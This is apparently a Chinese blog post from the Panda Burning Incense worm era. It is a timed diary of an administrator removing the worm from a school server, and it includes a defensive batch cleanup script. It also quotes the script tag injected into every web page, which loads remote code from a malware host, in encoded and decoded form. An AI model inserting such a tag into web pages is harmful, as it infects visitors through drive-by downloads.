“熊猫烧香”病毒,金山毒霸又称“武汉男生”,江民又与“威金”蠕虫病毒合并。这是一个感染型的蠕虫病毒,它能感染系统中 exe,com,pif,src,html,asp 等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为 gho 的文件,该文件是一系统备份工具 GHOST 的备份文件,使用户的系统备份文件丢失。
被感染的用户系统中所有 .exe 可执行文件全部被改成熊猫举着三根香的模样。
以下为我的经历:
23 日,阴,岁在丙戌,宜中病毒。
8:05 发现某个教育博客页面上有浮动的广告。因为与教育无关的广告,所以引起了警觉:这个网站可能被挂马了。
8:06 查看网页源代码,居然没有发现形如 <iframe...>、<script...> 的可疑代码。尝试打开校园网页面,也有类似广告浮现。清理 IE 缓存,上网,现象依旧。我知道,我的电脑中毒了:(
8:10 检查服务器,特别是系统文件夹。发现可疑文件:
C:WINDOWSsystem32ComLSASS.EXE
C:WINDOWSsystem32Comsmss.exe
尝试删除,进程锁定。用 Unlocker 强制删除,无效。用 360 安全卫士终止进程,成功。改名为 LSASS.EXE.BDU,smss.exe.BDU(以防万一删错了)。
8:30 再找可疑文件,发现隐藏文件不显示(而我是一直开启显示的)。文件夹选项中“查看”标签——“隐藏受保护的操作系统文件”居然消失了!
8:32 上网搜索,关键词:“隐藏受保护的操作系统文件无效病毒 LSASS.EXE smss.exe”,搜索到一篇《熊猫变种病毒手工清除方法》。
8.35 用搜索到网文中的方法,制作 reg 文件,解除“隐藏受保护的操作系统文件”锁定。结合网文中提到的,发现每个分区根目录里都有 Autorun.inf(网文中提到的是错的)、Pagefile.pif 两个文件。清除。
批处理:DelAutoRun.bat
@echo off
setlocal
SET ALL=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,W,X,Y,Z
FOR %%i IN (%ALL%) DO (IF EXIST"%%i:AUToRUN.INF" ((ATTRIB -S -H -A -R"%%i:AUToRUN.INF") & (DEL /F /Q"%%i:AUToRUN.INF") & (RD /S /Q"%%i:AUToRUN.INF")))
FOR %%i IN (%ALL%) DO (IF NOT EXIST"%%i:AUToRUN.INF" ((MD"%%i:AUToRUN.INF") & (ATTRIB +S +H +A +R"%%i:AUToRUN.INF") & (ECHO 屏蔽病毒>"%%i:AUToRUN.INF 屏蔽病毒.Shortway")))
FOR %%i IN (%ALL%) DO (IF EXIST"%%i:PAGEFILE.PIF" ((ATTRIB -S -H -A -R"%%i:PAGEFILE.PIF") & (DEL /F /Q"%%i:PAGEFILE.PIF") & (RD /S /Q"%%i:PAGEFILE.PIF")))
FOR %%i IN (%ALL%) DO (IF NOT EXIST"%%i:PAGEFILE.PIF" ((MD"%%i:PAGEFILE.PIF") & (ATTRIB +S +H +A +R"%%i:PAGEFILE.PIF") & (ECHO 屏蔽病毒>"%%i:PAGEFILE.PIF 屏蔽病毒.Shortway")))
PAUSE
8:36 查看校园网源码,发现每个网页最后都加上了一句代码(为防止误点击,作全角处理):
<scriptsrc=“http://%77%77%77%2E%79%61%79%61%64%6F%77%6E%2E%63%6F%6D/%62%32%2E%6A%73”></script>
解码后,就是:<scriptsrc=“www.yayadown.com/b2.js”></script>。马上把 *.yayadown.com 加入 IE 的“受限制站点”中。
严重了!
8:37 拔除网线,断网查杀。(其实有些晚了。亡羊补牢吧。)
早些下载的江民 VikingKiller.exe 专杀无效。
手工清除开始……
思路:用能“多文件替换”的文本处理软件替换删除这段代码。EmEditor 太占用资源。用 UltraEdit 吧。
打开 UltraEdit,搜索菜单→在多文件中替换→查找:<scriptsrc=“http://%77%77%77%2E%79%61%79%61%64%6F%77%6E%2E%63%6F%6D/%62%32%2E%6A%73”></script>(注意是半角)→替换为:(空)→文件类型:*.asp*;*.*htm*;*.php*→目录:c:;d:;e:;f:;g:→钩选“搜索子目录”→钩选“列出改变的文件”→全部替换!
UltraEdit 开始查找替换,几近失去响应状态……
9:15 查找并替换了 5000 多个网页文件。
9:16 不放心。在用 Windows 自带的搜索功能检查。
Win + F 调出搜索→文件名:*.*(通杀!)→文件中的字词:可以简单点,就用"%79%61%79%61%64%6F%77%6E"(即:yayadown)→查找范围:所有“本地硬盘……”→其他高级选项:搜索系统文件夹、搜索隐藏的文件和文件夹、搜索子文件夹→搜索。
10:00 找到几个漏网之鱼,因为我 UltraEdit 搜索的时候没有加 .php 格式。手工清理,结束。
10:01 还不放心。重启动电脑,手工 + 软件,查启动项,查进程,查进程加载项,查系统服务,没有可怀疑的项目。
10:30 插上网线,关掉 IIS。网上搜索。
金山毒霸“熊猫烧香”专题:
金山毒霸对“熊猫烧香”报道的最深最透,居然还有一个专用域名!
http://www.xiongmaoshaoxiang.com/
深度分析:http://news.duba.net/virnews/2007/01/19/102306.shtml
专杀下载:http://tool.duba.net/zhuansha/253.shtml
金山毒霸下载一 金山毒霸下载二 金山毒霸下载三 金山毒霸下载四
江民科技“熊猫烧香”专题:
http://www.jiangmin.com/News/jiangmin/index/important/2006101915457.htm
相关新闻:《受害网友悬赏 10 万美金,通缉“熊猫烧香”病毒作者》
http://www.jiangmin.com/News/jiangmin/index/important/2007122145321.htm
专杀下载:http://www.jiangmin.com/download/zhuansha04.htm
本地高速下载
瑞星科技“熊猫烧香”专题
专杀下载:http://it.rising.com.cn/Channels/Service/2006-11/1163505486d38734.shtml
本地下载
瑞星卡卡上网安全助手 3.0:http://www.rising.com.cn/kakatool/index.htm
11:15 专杀软件工作,偶午饭去。
午饭后,没有报告异常。启动 IIS。
到各办公室,播种疫苗去也……